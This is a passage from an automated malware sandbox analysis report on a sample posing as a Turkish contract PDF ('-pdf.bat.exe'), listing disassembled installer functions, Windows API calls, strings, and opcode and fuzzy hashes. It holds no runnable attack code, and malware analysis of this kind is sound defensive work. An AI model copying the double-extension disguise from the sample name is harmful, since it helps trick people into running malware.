                              • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A$C:\Users\user\polaritets$Call
                              • API String ID: 2624150263-2269717157
                              • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                              • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                              • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                              • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                              Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                              Strings
                              • C:\Users\user\polaritets, xrefs: 0040226E
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CreateInstance
                              • String ID: C:\Users\user\polaritets
                              • API String ID: 542301482-1397053051
                              • Opcode ID: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                              • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                              • Opcode Fuzzy Hash: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                              • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                              Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                              • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                              • Opcode Fuzzy Hash: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                              • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                              Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                              • GetDlgItem.USER32(?,00000408), ref: 00404F30
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                              • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                              • DeleteObject.GDI32(00000000), ref: 00405007
                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                              • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                              • ShowWindow.USER32(?,00000005), ref: 00405169
                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                              • ImageList_Destroy.COMCTL32(?), ref: 00405337
                              • GlobalFree.KERNEL32(?), ref: 00405347
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                              • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                              • ShowWindow.USER32(?,00000000), ref: 004054F1
                              • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                              • ShowWindow.USER32(00000000), ref: 00405503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 2564846305-813528018
                              • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                              • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                              • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                              • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                              Function 0040465F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                              Download Yara Rule
                              APIs
                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                              • GetDlgItem.USER32(?,000003E8), ref: 00404711
                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                              • GetSysColor.USER32(?), ref: 0040473F
                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                              • lstrlenW.KERNEL32(?), ref: 00404760
                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                              • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                              • SendMessageW.USER32(00000000), ref: 004047E2
                              • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                              • SetCursor.USER32(00000000), ref: 00404861
                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                              • SetCursor.USER32(00000000), ref: 0040487D
                              • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: Call$N
                              • API String ID: 3103080414-3438112850
                              • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                              • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                              • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                              • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                              • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                              • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                              • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                              Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                              • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                              • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                              • wsprintfA.USER32 ref: 004061E6
                              • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                              • GlobalFree.KERNEL32(00000000), ref: 004062CF
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 00406015
                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %ls=%ls$[Rename]
                              • API String ID: 2171350718-461813615
                              • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                              • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                              • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                              • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                              Function 004067CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                              Download Yara Rule
                              APIs
                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                              • CharNextW.USER32(?,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                              • CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                              Strings
                              • "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe", xrefs: 00406813
                              • *?|<>/":, xrefs: 00406821
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 589700163-738336238
                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                              • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                              • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                              Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                              • GetSysColor.USER32(00000000), ref: 00404562
                              • SetTextColor.GDI32(?,00000000), ref: 0040456E
                              • SetBkMode.GDI32(?,?), ref: 0040457A
                              • GetSysColor.USER32(?), ref: 0040458D
                              • SetBkColor.GDI32(?,?), ref: 0040459D
                              • DeleteObject.GDI32(?), ref: 004045B7
                              • CreateBrushIndirect.GDI32(?), ref: 004045C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                              • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                              • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                              Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                              • GetMessagePos.USER32 ref: 00404E7E
                              • ScreenToClient.USER32(?,?), ref: 00404E98
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                              • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                              • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                              Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                              Download Yara Rule
                              APIs
                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                              • MulDiv.KERNEL32(0008A6E8,00000064,0008A8EC), ref: 00402FE1
                              • wsprintfW.USER32 ref: 00402FF1
                              • SetWindowTextW.USER32(?,?), ref: 00403001
                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                              Strings
                              • verifying installer: %d%%, xrefs: 00402FEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
